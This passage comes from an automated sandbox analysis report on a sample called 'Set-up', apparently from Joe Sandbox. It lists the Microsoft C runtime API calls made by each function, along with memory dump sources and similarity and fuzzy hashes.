                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000,6BC04624,?,00000004), ref: 6BBA1D5E
                                                                                              • _memset.LIBCMT(00000000,00000000,?,00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000), ref: 6BBA1D6E
                                                                                              • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?), ref: 6BBA1D75
                                                                                                • Part of subcall function 6BB602C1: malloc.MSVCR100(?), ref: 6BB602CC
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6BBA1DA3
                                                                                              • InitializeSListHead.KERNEL32(?), ref: 6BBA1DB8
                                                                                              • InitializeSListHead.KERNEL32(?), ref: 6BBA1DBE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeadInitializeList$??2@_memsetmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2874038712-0
                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,?), ref: 6BB780EF
                                                                                              • _calloc_crt.MSVCR100(00000001,00000002), ref: 6BB879E6
                                                                                              • _errno.MSVCR100 ref: 6BB879F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory_calloc_crt_errno
                                                                                              • String ID:
                                                                                              • API String ID: 1856998256-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BB9D8E8
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000000), ref: 6BB9D903
                                                                                                • Part of subcall function 6BBA214D: std::exception::exception.LIBCMT(6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBA216C
                                                                                                • Part of subcall function 6BBA214D: _CxxThrowException.MSVCR100(?,6BC00018,6BBA1FE2), ref: 6BBA2181
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,00000000), ref: 6BB9D913
                                                                                              • ??2@YAPAXI@Z.MSVCR100(000000F8,00000000), ref: 6BB9D921
                                                                                              • ??2@YAPAXI@Z.MSVCR100(000000D0,00000000), ref: 6BB9D951
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,00000000), ref: 6BB9D978
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@Policy$Concurrency@@ElementExceptionH_prolog3Key@2@@Policy@SchedulerThrowValue@std::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 2052542019-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BBA53EB
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?,?,?,6BBA55C8,?,00000000,6BBA5EC0), ref: 6BBA5440
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?,?,?,6BBA55C8,?,00000000,6BBA5EC0), ref: 6BBA5447
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT(00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?,?,?,6BBA55C8,?,00000000,6BBA5EC0,?), ref: 6BBA5454
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFE24,00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?,?,?,6BBA55C8,?,00000000), ref: 6BBA5462
                                                                                              • ??1event@Concurrency@@QAE@XZ.MSVCR100(00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?,?,?,6BBA55C8,?,00000000,6BBA5EC0,?), ref: 6BBA546E
                                                                                                • Part of subcall function 6BBA538C: __uncaught_exception.MSVCR100(?,?,?,?,6BB95C86,00000001), ref: 6BBA53A1
                                                                                                • Part of subcall function 6BBA5538: ??1_TaskCollection@details@Concurrency@@QAE@XZ.MSVCR100(?,?,00000001,?,?,6BBA542B,00000000,00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?), ref: 6BBA5568
                                                                                                • Part of subcall function 6BBA5538: ??3@YAXPAX@Z.MSVCR100(?,?,?,00000001,?,?,6BBA542B,00000000,00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000), ref: 6BBA556E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@Concurrency@@$??1_??1event@Collection@details@Concurrency::unsupported_os::unsupported_osExceptionH_prolog3TaskThrow__uncaught_exception
                                                                                              • String ID:
                                                                                              • API String ID: 3788188742-0
                                                                                              APIs
                                                                                              • __doserrno.MSVCR100(6BB6A880,00000010), ref: 6BB6A8A4
                                                                                              • __doserrno.MSVCR100(6BB6A880,00000010), ref: 6BB8F4DE
                                                                                              • _errno.MSVCR100(6BB6A880,00000010), ref: 6BB8F4E6
                                                                                              • _errno.MSVCR100(6BB6A880,00000010), ref: 6BB8F4FC
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB6A880,00000010), ref: 6BB8F507
                                                                                              • _errno.MSVCR100(6BB6A880,00000010), ref: 6BB8F50E
                                                                                                • Part of subcall function 6BB6A5A9: EnterCriticalSection.KERNEL32(00000108,6BB6A610,0000000C,6BB7038E,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?), ref: 6BB6A5FA
                                                                                                • Part of subcall function 6BB6A78A: _get_osfhandle.MSVCR100(?,?,?,?,6BB6A865,?,6BB6A880,00000010), ref: 6BB6A795
                                                                                                • Part of subcall function 6BB6A78A: _get_osfhandle.MSVCR100(?), ref: 6BB6A7B8
                                                                                                • Part of subcall function 6BB6A78A: CloseHandle.KERNEL32(00000000), ref: 6BB6A7BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$__doserrno_get_osfhandle$CloseCriticalEnterHandleSection_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 1720121285-0
                                                                                              APIs
                                                                                              • _getptd.MSVCR100(6BB6ACE0,0000000C,6BB6D0AA,?,?,6BB69233,?), ref: 6BB6AC90
                                                                                              • _lock.MSVCR100(0000000D), ref: 6BB6ACA7
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB6D0B7
                                                                                              • InterlockedIncrement.KERNEL32(013316E8), ref: 6BB6D0DF
                                                                                                • Part of subcall function 6BB6ACFC: _unlock.MSVCR100(0000000D,6BB6ACCF), ref: 6BB6ACFE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Interlocked$CriticalDecrementEnterIncrementSection_getptd_lock_unlock
                                                                                              • String ID:
                                                                                              • API String ID: 1606532611-0
                                                                                              APIs
                                                                                              • __freebuf.LIBCMT ref: 6BB6A903
                                                                                                • Part of subcall function 6BB6A8AE: free.MSVCR100(?,?,?,6BB6A908,?,?), ref: 6BB6A8C5
                                                                                              • _fileno.MSVCR100(?,?,?), ref: 6BB6A909
                                                                                              • _close.MSVCR100(00000000,?,?,?), ref: 6BB6A90F
                                                                                              • _errno.MSVCR100 ref: 6BB88B94
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB88B9F
                                                                                                • Part of subcall function 6BB6A665: _fileno.MSVCR100(?,?,?,?,?,?,?,6BB6A900,?), ref: 6BB6A694
                                                                                                • Part of subcall function 6BB6A665: _write.MSVCR100(00000000,?,?,?,?,?,?,6BB6A900,?), ref: 6BB6A69B
                                                                                              • free.MSVCR100(?), ref: 6BB88BB4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _filenofree$__freebuf_close_errno_invalid_parameter_noinfo_write
                                                                                              • String ID:
                                                                                              • API String ID: 1941134952-0
                                                                                              APIs
                                                                                              • _errno.MSVCR100 ref: 6BB7816A
                                                                                              • _errno.MSVCR100 ref: 6BB78171
                                                                                              • _wfullpath.MSVCR100(?,?,?), ref: 6BB78182
                                                                                                • Part of subcall function 6BB61E61: GetFullPathNameW.KERNEL32(?,?,00000000,?), ref: 6BB61EA6
                                                                                              • _errno.MSVCR100 ref: 6BB7818C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$FullNamePath_wfullpath
                                                                                              • String ID:
                                                                                              • API String ID: 3755888649-0
                                                                                              APIs
                                                                                              • _errno.MSVCR100(00000000,00000000,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB75BD5
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB8A1A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID: $
                                                                                              • API String ID: 2959964966-3993045852
                                                                                              APIs
                                                                                              • iswctype.MSVCR100(?,00000008,?,?,?,?,?,?,6BB61BF0,?,?,?,00000000), ref: 6BB61AFE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: iswctype
                                                                                              • String ID: $
                                                                                              • API String ID: 304682654-3993045852
                                                                                              APIs
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,00000000,?,?,?,?,?,?,?,6BB9D20F,?,00000000,00000000,?), ref: 6BBA2A6A
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,00000000,?,?,?,?,?,?,?,6BB9D20F,?,00000000,00000000,?), ref: 6BBA2AF8
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,?,?,00000000,00000000,?,?,?,?,?,?,?,6BB9D20F,?,00000000,00000000), ref: 6BBA2C4F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,$,
                                                                                              • API String ID: 0-220654547
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6BB9C85F
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6BB9C920
                                                                                              • SetEvent.KERNEL32(?), ref: 6BB9C92F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterEventLeave
                                                                                              • String ID: $$,
                                                                                              • API String ID: 3094578987-53852779
                                                                                              • Opcode ID: 72a9c3cc64c6429d4ca86dd4ed7b90f87d7f1c8722d238685fe6db8ac0f18adb
                                                                                              • Instruction ID: 6fbcf0d208dc239058e7b0da06ac389629a5157b25f6dc6089628d5f28fe233d
                                                                                              • Opcode Fuzzy Hash: 72a9c3cc64c6429d4ca86dd4ed7b90f87d7f1c8722d238685fe6db8ac0f18adb
                                                                                              • Instruction Fuzzy Hash: 5E312270E0474AEFCB04EFA9D4C09AABBB1FF09300B1085ADD556A7611C335E985CFA0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID: P
                                                                                              • API String ID: 2959964966-3110715001
                                                                                              • Opcode ID: b4594cfbb7066c9c193d30eb55ddf32ecdc70655408ba1b29cc7a16e5209f139
                                                                                              • Instruction ID: e0b88861c7023f1c9b72da3e010388c56540816f1f3559d5eda770f319a18457
                                                                                              • Opcode Fuzzy Hash: b4594cfbb7066c9c193d30eb55ddf32ecdc70655408ba1b29cc7a16e5209f139
                                                                                              • Instruction Fuzzy Hash: B32104322442C5DBDB215E6C8CC059DB7A6EB53794B200DABE664872C4F77CCC858F92
                                                                                              APIs
                                                                                              • memcpy.MSVCR100(?,?,00000018), ref: 6BB9B5E4
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,00000018), ref: 6BB9B5FD
                                                                                              • _memset.LIBCMT(00000000,00000000,?), ref: 6BB9B62E
                                                                                              • memcpy.MSVCR100(?,?,00000008), ref: 6BB9B654
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$_memset
                                                                                              • String ID: ,
                                                                                              • API String ID: 2982297706-3772416878
                                                                                              • Opcode ID: ce875e42bf1f2ed31ba4c378de0ae8775ba556ddc7d3ab7dc834f6880682d53d
                                                                                              • Instruction ID: 361b38eb621a2f6f00d3cf37bd097492f85058f3f6b86eac488ff72397cb78ef
                                                                                              • Opcode Fuzzy Hash: ce875e42bf1f2ed31ba4c378de0ae8775ba556ddc7d3ab7dc834f6880682d53d
                                                                                              • Instruction Fuzzy Hash: CC21D572601B40AFD768DF28C996E6BF7E9EF84354F158529D00A8B251D678F841C750
                                                                                              APIs
                                                                                              • strcat_s.MSVCR100(6BB65C30,6BB65C0F,6BB65C20,?,00000083,00000083,?,6BB65C24,6BB65C0F,6BB65C30,00000002,6BB65C30,6BB65C0F,?,00000000,00000000), ref: 6BB649AD
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,6BB65C0F,6BB65C30,00000002,6BB65C30,6BB65C0F,?,00000000,00000000,00000005), ref: 6BB90ACD
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6BB90AD8
                                                                                              • _strcspn.LIBCMT(00000000,_.,,00000000,00000000,00000005), ref: 6BB90AE6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __invoke_watson$_strcspnstrcat_s
                                                                                              • String ID: _.,
                                                                                              • API String ID: 4004410220-2709443920
                                                                                              • Opcode ID: 766e146ed1fe45d45e7570a2a187947a03639e42e5fb0cd869641ca21cef2304
                                                                                              • Instruction ID: 11958980a2f67e2f4c17823721a7e67135204e7986401bdeb8f8ebe47fe96618
                                                                                              • Opcode Fuzzy Hash: 766e146ed1fe45d45e7570a2a187947a03639e42e5fb0cd869641ca21cef2304
                                                                                              • Instruction Fuzzy Hash: FFF0B433505289BB9B002E79AC8188F3B1AFE813BC721453AFE2851052E73DD9619B90
                                                                                              APIs
                                                                                              • CreateTimerQueue.KERNEL32(ECA782CA,?,00000000,ECA782CA,?,00000000,ECA782CA,00000000,6BB95CBE,6BB95C86), ref: 6BB9742E
                                                                                              • std::exception::exception.LIBCMT(6BB95C86,00000001,ECA782CA,?,00000000,ECA782CA), ref: 6BB97487
                                                                                              • _CxxThrowException.MSVCR100(ECA782CA,6BB6BDD8,6BB95C86,00000001,ECA782CA,?,00000000,ECA782CA), ref: 6BB9749C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateExceptionQueueThrowTimerstd::exception::exception
                                                                                              • String ID: bad allocation
                                                                                              • API String ID: 3396838967-2104205924
                                                                                              • Opcode ID: 91644e689f1ced72bb107cd41cb3b1734ba34668f8341af322ba439c4bbe47f0
                                                                                              • Instruction ID: 9856fd73ad2eba0b7d8d3fbe053c848feb991b46c1b3f445fd8416ac756544ff
                                                                                              • Opcode Fuzzy Hash: 91644e689f1ced72bb107cd41cb3b1734ba34668f8341af322ba439c4bbe47f0
                                                                                              • Instruction Fuzzy Hash: D511A070A042958BCB05EF6AD485A9E7BF4FB06744B111479E400D3300EB79DB40EBD1
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BB6BB00
                                                                                              • _malloc_crt.MSVCR100(00000018,00000014,6BB6BB81,00000000,00000000), ref: 6BB6BB0D
                                                                                                • Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5
                                                                                              • std::exception::exception.LIBCMT(?,00000001,00000014,6BB6BB81,00000000,00000000), ref: 6BB872C0
                                                                                              • _CxxThrowException.MSVCR100(6BB6BB81,6BB6BDD8,?,00000001,00000014), ref: 6BB872D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionH_prolog3_catchThrow_malloc_crtmallocstd::exception::exception
                                                                                              • String ID: bad allocation
                                                                                              • API String ID: 2340149201-2104205924
                                                                                              • Opcode ID: 729223b3df68eff74393fc52cc526162991d3660bdfc451e714fe3635bcee568
                                                                                              • Instruction ID: c6cfd6ba9bf52a3cd26f539873b693695545e1dab3e9c5cc2c6aff93345a20bf
                                                                                              • Opcode Fuzzy Hash: 729223b3df68eff74393fc52cc526162991d3660bdfc451e714fe3635bcee568
                                                                                              • Instruction Fuzzy Hash: 8C015E75900288AEDB28DF64D843F9DBBB4EF08394F108059F104AF291EBB89D00CB60
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6BB62200,00000008,6BB875E9,00000000,00000000), ref: 6BB62170
                                                                                              • _lock.MSVCR100(0000000D), ref: 6BB621A4
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6BB621B1
                                                                                                • Part of subcall function 6BB62228: _unlock.MSVCR100(0000000D,6BB621C3), ref: 6BB6222A
                                                                                              • _lock.MSVCR100(0000000C), ref: 6BB621C5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
